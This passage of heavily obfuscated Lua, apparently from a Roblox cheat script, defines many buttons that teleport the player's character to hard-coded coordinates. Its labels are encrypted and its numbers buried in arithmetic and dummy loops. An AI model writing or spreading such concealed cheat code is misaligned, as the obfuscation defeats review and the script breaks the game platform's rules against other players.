,v7("\86\189","\89\123\141\230\49\141\93"), -(((907 -(250 + 655)) + (0 -0)) -(1 -0)),0 + (1257 -((1631 -588) + (2170 -(1869 + 87)))) ,((0 -0) -0) + (1901 -(484 + 1417)) );wait();break;end end break;end end end});v31:Button({[v7("\199\116\238\24","\42\147\17\150\108\112")]=v7("\41\170\34\112\245\168\90","\136\111\198\77\31\135"),[v7("\33\8\171\90\191\229\20\162","\201\98\105\199\54\221\132\119")]=function(v100) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((2779.2398758 -1482) -(323 + (1489 -600))),((2576.8125 -(48 + 725)) -(1850 -717)) + ((1625 -1019) -(210 + 151 + 219)) ,107.074821 + (327 -(53 + (713 -446))) );end});v31:Button({[v7("\141\9\155\53","\204\217\108\227\65\98\85")]=v7("\120\207\250\234\62\128\8","\160\62\163\149\133\76"),[v7("\245\161\1\35\193\215\163\6","\163\182\192\109\79")]=function(v102) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((50.23987579999999 + 128) -(7 + 15 + (924 -(152 + 701)))),((2785.0625 -(430 + 881)) -(6 + 9 + (1293 -(557 + 338)))) -(116 + 276) ,((3666.074821 -2365) -(18 + (3375 -2411))) -((2048 -1277) -(1219 -653)) );end});v31:Button({[v7("\0\35\24\212","\149\84\70\96\160")]=v7("\30\10\2\226\42\70\90","\141\88\102\109"),[v7("\144\82\198\124\24\60\86\202","\161\211\51\170\16\122\93\53")]=function(v104) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((846.2398757999999 -(499 + 302)) + 24 + 16),(1084.3125 -(39 + 827)) + (350 -223) + ((2559 -1413) -((79 -59) + (1274 -444))) ,57.074821 + 2 + 14 + ((488 -321) -(19 + 97 + 10)) );end});v31:Button({[v7("\207\171\170\60","\72\155\206\210")]=v7("\96\118\91\1\33\6\34","\83\38\26\52\110"),[v7("\123\22\43\74\90\22\36\77","\38\56\119\71")]=function(v106) local v107=0;local v108;local v109;while true do if (v107==(0 -0)) then v108=(104 -(103 + 1)) + 0 ;v109=nil;v107=555 -(475 + 79) ;end if ((2 -1)==v107) then while true do if (v108==(0 -0)) then v109=396 -(115 + (1019 -(71 + 471 + 173 + 23))) ;while true do if (v109==(((1503 -(1395 + 108)) -(0 -0)) -(0 + 0))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((1241.2398758 -(7 + 1197)) + 34 + 7 + 7),(534.5625 + 947) -(303 + 565) ,((1417.074821 -(27 + 292)) -(1995 -1314)) -((989 -213) -473) ,((13986 -10651) -((2219 -1093) + (809 -384))) -(((758 -(43 + 96)) -(118 + 287)) + (6404 -4834)) ,((7679 -4282) -2530) -(((1387 + 284) -(118 + 284 + 719)) + 317) ,1 -(0 -(0 -0)) ,(377 -(55 + 87 + 235)) + ((0 -0) -(0 + 0)) ,(1 + 0) -((1751 -(1414 + 337)) + (1940 -(1642 + 298))) ,v7("\190\191","\54\147\143\56\182\69"), -(((2549 -1571) -((1590 -1037) + (1258 -834))) + ((0 + 0) -0)),(0 + 0) -(0 + 0) ,((1255 -(357 + 615)) + 2 + 0) -((193 -114) + 55 + 130 + 21) );wait();break;end end break;end end break;end end end});v31:Button({[v7("\226\132\231\93","\191\182\225\159\41")]=v7("\13\30\39\90\153\199\155","\162\75\114\72\53\235\231"),[v7("\175\61\72\238\81\3\143\55","\98\236\92\36\130\51")]=function(v110) local v111=0 -0 ;local v112;while true do if (v111==(0 + 0)) then v112=(50 + 684 + 992) -(1049 + 619 + (1335 -(384 + 917)) + (721 -(128 + 569))) ;while true do if (v112==(((5152 -(1407 + 136)) -(3831 -(687 + 1200))) -(970 + ((3646 -(556 + 1154)) -(4365 -3124))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((589.2398757999999 -(9 + 86)) -273) -((461 -(275 + 146)) + 16 + 80)),((5457.8125 -(29 + 35)) -4277) -(1284 -((1059 -820) + (1534 -1020))) ,(9288.074821 -7184) -(134 + 71 + (1389 -(53 + 959)) + 1408) ,(1737 -(312 + 96)) -((1383 -586) + (817 -(147 + 138))) ,((899 -(813 + 86)) + 0 + 0) -(0 + 0) ,1 -((0 -0) -(492 -(18 + 474))) ,0 -((406 + 796) -((1217 -844) + 829)) ,(2911 -(860 + 226)) -((1498 -(121 + 182)) + ((168 + 1192) -((1716 -(988 + 252)) + 29 + 226))) ,v7("\233\73","\80\196\121\108\218\37\200\213"), -(((355 + 776) -((2339 -(49 + 1921)) + 761)) -0),(1131 -(223 + 667)) -((161 -(51 + 1)) + 78 + ((166 -69) -43)) ,780 -((346 -184) + (1743 -(146 + 979))) );wait();break;end end break;end end end});v31:Button({[v7("\52\118\26\107","\234\96\19\98\31\43\110")]=v7("\32\19\93\200\190\50\218\86","\235\102\127\50\167\204\18"),[v7("\115\160\249\47\70\47\83\170","\78\48\193\149\67\36")]=function(v113) local v114=0 + 0 ;local v115;local v116;while true do if (v114==(606 -(311 + 294))) then while true do if (v115==((663 -425) -(64 + 74 + 100))) then v116=((1443 -(496 + 947)) + (1358 -(1233 + 125))) -((0 + 0) -0) ;while true do if (v116==(0 + (336 -(130 + 14 + 192)))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((52.23987579999999 + 221) -((1687 -(963 + 682)) + 146 + 28)) + (1532 -(504 + 1000))),2027.0625 -(855 + 414 + 183 + 17) ,(23.074820999999986 + 219) -((142 -45) + 31) ,(0 + 0 + 0 + 0) -(0 + (182 -(156 + 26))) ,0 + 0 + (1504 -(363 + (1784 -643))) ,(2407 -((1347 -(149 + 15)) + 397)) -(((3401 -(890 + 70)) -(1756 -(39 + 78))) + 18 + (488 -(14 + 468))) ,((2689 -1466) + (1154 -741)) -(((1728 + 1620) -(1913 + 38 + 24)) + 36 + 130 + 44 + 53) ,((695 + 1954) -(3154 -1506)) -(((2357 + 27) -(565 + (4806 -3438))) + 14 + 535) ,v7("\125\78","\33\80\126\224\120"), -(((54 -(12 + 39)) -(2 + 0)) + (0 -0)),(0 -0) -(0 + 0) ,((875 + 786) -((3744 -2267) + 184)) + ((0 + 0) -0) );wait();break;end end break;end end break;end if (0==v114) then v115=(0 -0) -(1710 -(1596 + 114)) ;v116=nil;v114=2 -1 ;end end end});v31:Button({[v7("\216\173\27\208","\60\140\200\99\164")]=v7("\161\248\11\41\176\199\165\85","\194\231\148\100\70"),[v7("\101\77\205\175\244\201\69\71","\168\38\44\161\195\150")]=function(v117) local v118=0;local v119;while true do if (v118==0) then v119=(713 -(164 + 549)) -((1438 -(1059 + 379)) + (0 -0)) ;while true do if ((1384 -(746 + 331 + 307))==v119) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((150.23987579999994 + 738) -((956 -(145 + 247)) + 240 + 52)) + (90 -(18 + 19))),(4369.3125 -2895) -(2844 -(365 + 1535)) ,(361.074821 + 57) -((396 -152) + 60) ,(720 -(254 + 466)) -(560 -(544 + 16)) ,((0 -0) + (628 -(294 + 334))) -((729 -(236 + 17)) -(18 + 23 + 339 + 96)) ,342 -((1219 -((3532 -2594) + (298 -235))) + 49 + 46 + 24 + 4) ,(1125 -((1730 -(413 + 381)) + 8 + 181)) + (0 -0) ,(2 -1) + (1970 -(582 + 1388)) ,v7("\205\172","\118\224\156\226\22\80\136\214"), -((1 -0) + 0 + 0),((3558 -(326 + 38)) -((4629 -3064) + (67 -19))) -((1569 -(47 + 573)) + 586 + 17 + 29) ,0 + 0 );wait();break;end end break;end end end});v31:Button({[v7("\118\235\65\148","\224\34\142\57")]=v7("\248\171\202\210\97\177\12\92","\110\190\199\165\189\19\145\61"),[v7("\249\234\123\228\137\198\217\224","\167\186\139\23\136\235")]=function(v120) local v121=0 -0 ;local v122;while true do if (v121==(0 -0)) then v122=0;while true do if (v122==((2802 -(1269 + 395)) -((1274 -(76 + 416)) + 356))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((750.2398757999999 -(319 + 124)) -((401 -225) + 91)) + ((1124 -(564 + 443)) -(198 -126))),(2393.5625 -(337 + 121)) -((2335 -1538) + ((3117 -2181) -(2211 -(1261 + 650)))) ,17.074821 + 42 + 55 ,560 -((486 -180) + ((3163 -(772 + 1045)) -(138 + 837 + (261 -(102 + 42))))) ,(3719 -(1524 + 320)) -((1427 -(1049 + 221)) + 1718) ,1 + 0 + 0 ,(0 -(156 -(18 + 138))) -((0 -0) -(1102 -(67 + 1035))) ,(349 -(136 + 212)) + (0 -0) ,v7("\87\229","\109\122\213\232"), -((1019 -(697 + 258 + 63)) -((0 + 0) -0)),(3107 -(3244 -(240 + 1364))) -(((3153 -(1050 + 32)) -(4184 -3012)) + 132 + 90 + (1401 -(331 + 724))) ,(610 -(23 + 261)) -((514 -322) + ((2005 -(269 + 375)) -(322 + (1630 -(267 + 458))))) );wait();break;end end break;end end end});v31:Button({[v7("\218\242\186\36","\80\142\151\194")]=v7("\37\202\120\67\17\134\38\31","\44\99\166\23"),[v7("\95\246\37\58\49\165\127\252","\196\28\151\73\86\83")]=function(v123) local v124=0 + 0 ;local v125;while true do if (v124==0) then v125=(2453 -1177) -(((1745 -(667 + 151)) -((2099 -(1410 + 87)) + (1906 -(1504 + 393)))) + (2149 -((1213 -764) + (1919 -1179)))) ;while true do if (((796 -(461 + 335)) + ((112 + 760) -((2587 -(1730 + 31)) + (1713 -(728 + 939)))))==v125) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(301.2398758 -216),(741.8125 -375) + ((2417 -1362) -((1313 -(138 + 930)) + 642 + 60)) ,(281.074821 + 78) -(210 + 35) ,(0 -0) + (1766 -(459 + 1307)) + 0 ,(1870 -(474 + 1396)) -(0 -0) ,1 + 0 ,(1898 -(260 + 6 + 1632)) + ((1260 -820) -(49 + 333 + 58)) ,((19 -13) -(17 -13)) -((592 -(562 + 29)) + 0) ,v7("\190\83","\22\147\99\73\112\226\56\120"), -(((1064 + 184) -644) -(268 + 335)),((2281 -(374 + 1045)) -(453 + 119)) -((186 -126) + (1435 -(902 + 303))) ,((1893 -(448 + 190)) -(221 + 462)) -(426 + 66 + 80) );wait();break;end end break;end end end});v31:Button({[v7("\140\112\250\225","\237\216\21\130\149")]=v7("\164\66\80\80\162\137\15\214","\62\226\46\63\63\208\169"),[v7("\198\24\89\143\29\12\44\85","\62\133\121\53\227\127\109\79")]=function(v126) local v127=0 + 0 ;local v128;local v129;while true do if (v127==(0 -0)) then v128=0 -(0 -0) ;v129=nil;v127=1;end if (v127==(1495 -(1307 + 187))) then while true do if ((0 -0)==v128) then v129=(0 -0) + 0 + 0 ;while true do if (v129==((4464 -3008) -((965 -(232 + 451)) + ((2735 + 129) -(1121 + 503 + 66))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((863.2398757999999 -(510 + 54)) -(22 + (386 -194))),((1977.0625 -(13 + 23)) -((940 -457) + (287 -87))) -(((3691 -1659) -((2492 -(830 + 258)) + (207 -148))) + ((415 + 247) -(358 + 62))) ,439.074821 -(((1501 -(860 + 581)) -(55 -40)) + ((830 + 215) -((709 -(237 + 4)) + (697 -400)))) ,(0 -0) + ((1064 -502) -(334 + 187 + 41)) ,((0 + 0) -(0 -0)) -(0 + 0) ,(2 -(1 + 0)) + ((1426 -(85 + 1341)) -(0 -0)) ,((821 -530) + (1105 -(45 + 327))) -(((1776 -834) -((643 -(444 + 58)) + 42 + 53)) + 54 + 259 + 5) ,((1576 + 1646) -(5709 -3739)) -(((3465 -(64 + 1668)) -(2985 -(1227 + 746))) + (384 -259) + (751 -346)) ,v7("\93\68","\194\112\116\82\149\182\206"), -(495 -(415 + 79)),(33 + 1238) -(945 + 326) ,(491 -(142 + 349)) -((0 + 0) -0) );wait();break;end end break;end end break;end end end});v31:Button({[v7("\13\173\84\12","\110\89\200\44\120\160\130")]=v7("\141\207\68\73\81\10\106\24","\45\203\163\43\38\35\42\91"),[v7("\241\132\208\47\133\168\87\217","\52\178\229\188\67\231\201")]=function(v130) local v131=0 -0 ;local v132;while true do if (v131==(0 + 0)) then v132=0 + 0 + (0 -0) + (1864 -(1710 + 154)) + 0 ;while true do if (v132==((985 -(603 -(200 + 118))) -(160 + 44 + 67 + ((1034 -442) -(92 + (104 -33)))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(71.2398758 + 8 + 3 + 0 + 2 + 1),(307.3125 + 1612) -(((5127 -2760) -(2209 -(363 + 887))) + 92) ,((3431.074821 -1466) -((2732 -2158) + 191)) -(72 + 389 + 516 + (254 -145)) ,(881 + 407) -((2487 -(3158 -(674 + 990))) + 295) ,0 + 0 + 0 + ((348 + 501) -(254 + (942 -347))) ,((1182 -(507 + 548)) -(55 + (908 -(289 + 548)))) + (0 -(1818 -(821 + 997))) ,((2045 -(195 + 60)) -(155 + 418 + (2718 -(251 + 1250)))) -(0 -(0 -0)) ,1 + 0 + 0 + (0 -(1032 -(809 + 223))) ,v7("\108\17","\67\65\33\48\100\151\60"), -(1172 -(((1979 -622) -((2144 -1430) + (743 -518))) + 555 + 198)),(0 -0) + ((0 + 0) -0) ,0 + (617 -(14 + 603)) + ((129 -(118 + 11)) -(0 + 0)) );wait();break;end end break;end end end});v31:Button({[v7("\235\226\182\204","\147\191\135\206\184")]=v7("\162\36\169\206\202\19\227\210","\210\228\72\198\161\184\51"),[v7("\21\72\255\28\113\207\53\66","\174\86\41\147\112\19")]=function(v133) local v134=0;local v135;local v136;while true do if ((0 + 0)==v134) then v135=(2348 -1542) -((1067 -(551 + 398)) + 688) ;v136=nil;v134=1 + 0 ;end if (v134==(1 + 0)) then while true do if (v135==(48 -(21 + 4 + 23))) then v136=((171 -125) + (437 -247)) -(((627 + 1305) -((3680 -2753) + 959)) + (640 -(125 + 325))) ;while true do if (v136==((732 -((105 -(40 + 49)) + 716)) + ((0 -0) -(490 -(99 + 391))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(22.239875799999993 + (160 -(10 + 1 + 86))),((9864.5625 -7620) -(3278 -1954)) -(396 + 10 + (323 -200)) ,(2003.074821 -(1032 + 572)) -((592 -(203 + 214)) + 110) ,1769 -((4415 -(4483 -(568 + 1249))) + 20) ,((0 + 0) -(0 -0)) + (1796 -((1942 -1439) + (2599 -(913 + 393)))) ,(3736 -2413) -((1764 -515) + ((613 -(269 + 141)) -130)) ,(0 -0) + (1981 -(362 + 1619)) ,1626 -(950 + 675) ,v7("\22\80","\203\59\96\237\107\69\111\113"), -((829 + 123 + 194) -((1645 -(216 + 963)) + (1740 -((2097 -(485 + 802)) + 251)))),(559 -(432 + 127)) + (1073 -(1065 + 8)) ,(461 + 113 + 89) -((1775 -(635 + 966)) + 109 + 42 + (380 -(5 + 37))) );wait();break;end end break;end end break;end end end});v31:Button({[v7("\16\19\180\245","\183\68\118\204\129\81\144")]=v7("\40\161\127\235\25\194\95\250","\226\110\205\16\132\107"),[v7("\200\194\236\213\67\234\192\235","\33\139\163\128\185")]=function(v137) local v138=((0 -0) + 0) -(533 -(18 + 25 + (775 -285))) ;while true do if (v138==(0 -(0 + 0))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((1699.2398758 -881) -(711 + (83 -61))),(3430.8125 -(4795 -2252)) -(((2777 -1615) -(240 + 446 + 173)) + (750 -(318 + 211))) ,((2396.074821 -1909) + 1527) -(((1755 -(963 + 624)) -(27 + 35)) + 119 + (2521 -(518 + 328))) ,1269 -(((4604 -2629) -((2148 -804) + (717 -(301 + 16)))) + ((4229 -2786) -((715 -460) + (391 -241)))) ,0 + 0 + 0 + 0 + 0 + 0 ,((8 -4) -(2 + 1)) + ((0 + 0) -(0 -0)) ,0 + 0 + (1019 -(829 + 190)) ,4 -((6215 -4473) -((510 -106) + (1845 -510))) ,v7("\26\8","\190\55\56\100"), -(((1013 -605) -(44 + 139 + 73 + 150)) -((2 -1) -(0 + 0))),(0 + (613 -(520 + 93))) -(0 + (276 -(259 + 17))) ,((20 + 317) -(10 + 118 + 209)) -(0 + 0) );wait();break;end end end});v31:Button({[v7("\98\170\36\10","\147\54\207\92\126\115\131")]=v7("\43\61\58\114\31\62\92\105","\30\109\81\85\29\109"),[v7("\220\112\88\186\52\223\255\244","\156\159\17\52\214\86\190")]=function(v139) game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((1922.2398758 -1354) -(118 + (811 -(396 + 195)))) -((142 -93) + (1857 -(440 + 1321)))),((2547.0625 -(1059 + 770)) -(108 + 341)) + (309 -242) ,(180.074821 + 219) -285 ,(659 -(424 + 121)) -(((3 + 13) -12) + ((2950 -(641 + 706)) -(711 + 310 + 472))) ,(1119 -(975 -(249 + 191))) -(57 + ((4338 -3342) -(270 + 199))) ,(463 + 431 + 534) -((157 -116) + ((3632 -(183 + 244)) -(29 + 551 + 1239))) ,((1036 -(434 + 296)) -(647 -444)) -((529 -(169 + 343)) + 0 + 0 + 86) ,(1 -0) + (0 -0) + 0 ,v7("\227\191","\220\206\143\221"), -((1 + 0 + (0 -0)) -((1123 -(651 + 472)) -0)),(99 + 45 + 14) -(((543 + 715) -(645 + (636 -114))) + ((2340 -(397 + 86)) -((1886 -(423 + 453)) + 80 + 700))) ,(0 + 0) -(0 + 0 + 0 + 0) );wait();end});v31:Button({[v7("\178\120\53\3","\178\230\29\77\119\184\172")]=v7("\211\178\5\20\101\184\164\231","\152\149\222\106\123\23"),[v7("\254\39\250\79\183\220\37\253","\213\189\70\150\35")]=function(v141) local v142=0 + 0 ;while true do if (v142==0) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((2385.2398758 -(50 + 1140)) -(816 + 128)) -(122 + 26 + 18)),((97.3125 + 1459) -(1472 -447)) -((1490 + 569) -(1045 + (1387 -(157 + 439)))) ,(954.0748209999999 -(1003 -426)) -((1332 -931) -(408 -270)) ,918 -(782 + 136) ,855 -(112 + 743) ,(1172 -(1026 + 145)) + (505 -(351 + 27 + 127)) ,(1574 -((1999 -(493 + 225)) + (1076 -783))) + ((162 + 104) -((74 -46) + 238)) ,((1 + 3) -(5 -3)) -(1560 -(403 + 978 + (297 -119))) ,v7("\2\5","\104\47\53\20"), -(1 + (1595 -(210 + 1385)) + (1689 -(1201 + 488)) + 0 + 0),((584 -255) + 442) -((1123 -(1428 -631)) + (816 -(352 + 233)) + (516 -302)) ,470 -(381 + 49 + 40) );wait();break;end end end});v31:Button({[v7("\151\73\153\8","\111\195\44\225\124\220")]=v7("\254\74\15\124\185\235\138\22","\203\184\38\96\19\203"),[v7("\26\114\117\77\204\56\112\114","\174\89\19\25\33")]=function(v143) local v144=0 -0 ;local v145;local v146;while true do if (v144==(575 -(489 + 85))) then while true do if (v145==(1501 -(277 + 1224))) then v146=((1493 -(663 + 830)) + 0 + 0) -(0 -0) ;while true do if (v146==((875 -(461 + 414)) -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((223.23987579999994 + 1105) -(1074 + 33 + 49)) -((19 + 171) -(102 + 1))),((2379.5625 -(172 + 78)) -(214 + (2531 -961))) -(((547 + 938) -((1428 -438) + 465)) + 5 + 10 + 7 + 13) ,(58.074821 -23) + 44 + (44 -9) + 0 + 0 ,(696 + 561) -(372 + 671 + ((3351 -2509) -(1463 -835))) ,((530 + 1196) -(953 + 715 + (505 -(133 + 314)))) -0 ,((320 + 1519) -(512 + 114)) -(((1055 -(199 + 14)) -(1857 -1338)) + (1837 -(2497 -(647 + 902)))) ,(0 -(0 -0)) -(233 -(85 + 148)) ,(1870 -(426 + 863)) -(168 + (903 -710) + (1695 -(873 + 781)) + 178) ,v7("\98\66","\107\79\114\50\46\151\231"), -(((2 -0) + 0) -(3 -(4 -2))),(2314 -(46 + 63 + (6963 -5078))) -(((2180 -658) -(1269 + (593 -393))) + (2214 -(414 + 1533))) ,((0 + 0) -(555 -(443 + 112))) + (1479 -(888 + 591)) );wait();break;end end break;end end break;end if (0==v144) then v145=0 + (0 -0) ;v146=nil;v144=1;end end end});v31:Button({[v7("\13\163\173\61","\160\89\198\213\73\234\89\215")]=v7("\110\125\187\241\215\8\35\229","\165\40\17\212\158"),[v7("\198\216\4\63\36\228\218\3","\70\133\185\104\83")]=function(v147) local v148=0 + 0 ;local v149;local v150;while true do if ((0 -0)==v148) then local v228=0;while true do if (v228==(0 + 0)) then v149=(395 + 420) -(11 + 87 + 717) ;v150=nil;v228=1 -0 ;end if (v228==(1 -0)) then v148=1;break;end end end if (v148==(1679 -(136 + 1542))) then while true do if (v149==(0 -0)) then v150=((820 + 6) -((1274 -472) + 24)) + ((0 + 0) -(486 -(68 + 418))) ;while true do if (v150==((0 -0) -(0 + (0 -0)))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(498.2398758 -((21 -9) + 3 + 0 + (1490 -(770 + 322)))),(72.8125 + 1162) -(18 + 159 + 233 + 572) ,(13.074820999999986 + 80 + (479 -144)) -((1692 -819) -559) ,((0 -0) -(0 -0)) + 0 + 0 + (0 -0) ,0 + 0 + 0 ,(337 + 365 + 149) -(10 + 5 + 5 + 305 + 83 + (1664 -1222)) ,0 + ((1989 -556) -(797 + 215 + 421)) ,4 -3 ,v7("\73\21","\169\100\37\36\74"), -((419 -292) -(((232 + 331) -447) + (49 -39))),(831 -(762 + 69)) -(0 -0) ,((1395 + 224) -(924 + 503 + 192)) + (0 -0) + 0 + 0 );wait();break;end end break;end end break;end end end});v31:Button({[v7("\52\130\186\68","\48\96\231\194")]=v7("\238\86\1\34\11\152\253\209","\227\168\58\110\77\121\184\207"),[v7("\88\61\179\76\179\218\114\174","\197\27\92\223\32\209\187\17")]=function(v151) local v152=0;while true do if (v152==(0 + 0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(7.239875799999993 + ((701 -521) -(259 -(8 + 149)))),(866.0625 + 97) -((1862 -(1199 + 121)) + (331 -135)) ,((270.074821 -150) + 60 + 84) -(535 -385) ,((756 -430) -(170 + 22 + (1941 -(518 + 1289)))) -(0 -0) ,(170 + 1106) -((460 -144) + 708 + 252) ,(470 -(304 + 165)) + 0 + 0 + 0 ,(160 -(54 + 106)) + (1969 -(1618 + 351)) ,(774 + 323) -((1564 -(10 + 1006)) + 41 + 120 + 358 + 29) ,v7("\78\15","\155\99\63\163"), -(((1 + 2) -(6 -4)) + ((1584 -(912 + 121)) -(40 + 43 + (1757 -(1140 + 149))))),(0 + 0) -((2406 -600) -(224 + 978 + (2066 -1462))) ,0 -(0 -0) );wait();break;end end end});v31:Button({[v7("\182\212\185\153","\228\226\177\193\237\217")]=v7("\18\188\44\233\38\240\113\181","\134\84\208\67"),[v7("\48\173\138\80\17\173\133\87","\60\115\204\230")]=function(v153) local v154=(0 + 0) -0 ;local v155;while true do if (v154==(0 -(0 -0))) then v155=(0 -0) -(186 -(165 + 21)) ;while true do if (v155==(((1987 -(61 + 50)) -(19 + 26 + (1334 -1054))) -(1087 + 39 + (749 -377) + 53))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((193.2398758 + 297) -((1504 -(1295 + 165)) + 17 + 57 + 159 + 128)),(23.3125 + 34 + (1663 -(819 + 578))) -((1635 -(331 + 1071)) -(850 -(588 + 155))) ,((3639.074821 -(546 + 736)) -((2277 -(1834 + 103)) + 1571)) -(81 + 50 + 201) ,((8630 -5737) -((3499 -(1536 + 230)) + 39)) -((609 -(128 + 363)) + ((586 + 2170) -1753)) ,1034 -((310 -185) + 909) ,((504 + 1445) -((1815 -719) + 852)) + (0 -0) ,(0 + 0) -0 ,378 -(((490 -288) -(42 + 18)) + (1244 -(615 + 394))) ,v7("\170\106","\16\135\90\139"), -((4 + 0 + 0) -(3 + 0)),(0 -0) + (512 -(409 + (467 -364))) ,(1213 -((697 -(59 + 592)) + 190)) -(553 + ((1148 -629) -((93 -42) + 32 + 12))) );wait();break;end end break;end end end});v31:Button({[v7("\96\113\30\39","\24\52\20\102\83\46\52")]=v7("\226\35\46\43\29\132\125\117","\111\164\79\65\68"),[v7("\229\216\143\210\44\235\197\210","\138\166\185\227\190\78")]=function(v156) local v157=0 + 0 ;local v158;while true do if (v157==((1488 -(70 + 101)) -((2753 -1639) + 203))) then v158=((515 + 211) -((572 -344) + (739 -(123 + 118)))) -(0 + 0 + 0 + 0) ;while true do if (v158==((1399 -(653 + 746)) + 0 + ((1239 -576) -((250 -76) + (1309 -820))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -((3563.2398758 -(969 + 1226)) -(666 + 374 + ((1877 + 271) -(102 + 728 + 168 + 907)))),((2519.5625 -1491) -(289 + 14 + (408 -187))) -(1569 -(885 + 349)) ,91.074821 + 23 + ((3460 -2191) -((671 -440) + (2006 -(915 + 53)))) ,(801 -(768 + 33)) + (0 -0) + (1162 -(171 + (1744 -753))) ,((328 -(287 + 41)) -0) + ((847 -(638 + 209)) -(0 + 0)) ,(2 -(1687 -(96 + 1590))) + (1672 -(741 + 931)) + 0 + 0 ,((0 -0) -(0 -0)) -((0 + 0) -(0 + 0)) ,2 -((1 + 0) -0) ,v7("\134\36","\121\171\20\165\87\50\67"), -((7 -5) -(1 + 0)),((0 + 0) -0) + (1248 -((452 -341) + 1021 + 116)) ,((652 -(64 + 430)) -(91 + 0 + 67)) -(0 -(363 -(106 + 257))) );wait();break;end end break;end end end});v31:Button({[v7("\242\61\161\34","\98\166\88\217\86\217")]=v7("\208\250\118\14\148\156\164\163","\188\150\150\25\97\230"),[v7("\249\136\83\14\14\236\217\130","\141\186\233\63\98\108")]=function(v159) local v160=0 + 0 ;local v161;while true do if (v160==(721 -(496 + 225))) then v161=(0 -0) + (0 -0) ;while true do if (v161==(1658 -(256 + 1402))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(((3260.2398758 -(30 + 1869)) -((1792 -(213 + 1156)) + 100)) -((190 -(96 + 92)) + 41 + 196 + ((2322 -(142 + 757)) -(741 + 168)))),27.8125 + 10 + 13 + ((941 -(32 + 47)) -((2303 -(1053 + 924)) + 436 + 9)) ,1443.074821 -(((5987 -2510) -(4328 -(685 + 963))) + ((2407 -1223) -652)) ,(0 -0) + ((1709 -(541 + 1168)) -0) ,(1597 -(645 + 952)) + (711 -((1368 -(669 + 169)) + 181)) ,(882 -((2126 -1512) + (579 -312))) + 0 + 0 ,((8 + 24) -((784 -(181 + 584)) + 13)) -(1395 -(665 + 730)) ,((5639 -3682) -(1537 -783)) -((868 -(1845 -(540 + 810))) + (3314 -2485)) ,v7("\188\186","\69\145\138\76\214"), -((2091 -(3736 -2377)) -(99 + 25 + (555 -(166 + 37)) + (448 -193))),0 -(1881 -(22 + 1859)) ,0 + ((3584 -(843 + 929)) -((1555 -(30 + 232)) + (1482 -963))) );wait();break;end end break;end end end});v31:Button({[v7("\68\202\145\157","\118\16\175\233\233\223")]=v7("\173\136\58\180\252\203\47\221","\29\235\228\85\219\142\235"),[v7("\30\213\182\209\117\79\36\89","\50\93\180\218\189\23\46\71")]=function(v162) local v163=777 -(55 + 722) ;local v164;while true do if ((0 -0)==v163) then v164=1130 -((2044 -(78 + 1597)) + 168 + 593) ;while true do if (v164==(0 + 0 + ((0 + 0) -(549 -(305 + 244))))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(154.2398758 -(65 + 4)),96.0625 + ((151 -(95 + 10)) -28) ,(153.074821 + 62) -(320 -219) ,(0 -0) + ((762 -(592 + 170)) -(0 -0)) ,((2576 -1550) -(368 + 420)) -(64 + 174) ,(2 -1) + 0 + 0 + 0 ,((0 -0) + 0) -(0 + 0) ,(624 -287) -(((841 -(353 + 154)) -190) + 45 + (195 -48)) ,v7("\147\244","\40\190\196\59\44\36\188"), -((1 -0) + 0 + 0 + 0 + 0 + 0),216 -((1138 -(468 + 241 + (559 -172))) + 174) ,((3516 -1658) -((1568 -895) + 1185)) + (86 -(7 + 79)) );wait();break;end end break;end end end});v31:Button({[v7("\8\64\196\160","\109\92\37\188\212\154\29")]=v7("\34\227\171\204\35\26\86\184","\58\100\143\196\163\81"),[v7("\57\67\47\175\61\72\230\5","\110\122\34\67\195\95\41\133")]=function(v165) local v166=0 + 0 ;while true do if (v166==(181 -(24 + 157))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=CFrame.new( -(169.2398758 -84),((443.3125 -235) -(39 + 97)) + ((118 -74) -30) ,83.074821 + ((430 -(262 + 118)) -(1102 -(1038 + 45))) ,(0 -0) + (230 -(19 + 211)) + (113 -(88 + 25)) ,((2861 -1737) + 189 + 191) -(339 + 24 + (1540 -(1435 -(1007 + 29)))) ,(389 + 322 + 870) -((2358 -1175) + ((1903 -1124) -(1806 -1424))) ,(419 + 1461) -(446 + (2245 -(340 + 471))) ,(1285 -((2619 -1579) + (832 -(276 + 313)))) -((4 -2) -(1 + 0)) ,v7("\56\225","\182\21\209\59\42"), -(((784 + 1064) -(559 + 121 + 1167)) + (1931 -((2581 -(495 + 1477)) + 1322))),(1359 -905) -(9 + 4 + 441) ,(0 -0) + (0 -0) );wait();break;end end end});v31:Button({[v7("\131\82\221\9","\222\215\55\165\125\65")]=v7("\10\221\201\21\224\129\191\18","\42\76\177\166\122\146\161\141"),[v7("\134\139\9\194\123\119\166\129","\22\197\234\101\174\25")]=function(v167) local v168=403 -(342 + 61) ;local v169;local v170;while true do if (v168==(1 + 0)) then while true do if (v169==((165 -(4 + 161)) + 0 + 0)) then v170=(0 -0) -(0 + (0 -0)) ;while true do if (v170==((0 -0) + 0 + 0)) then 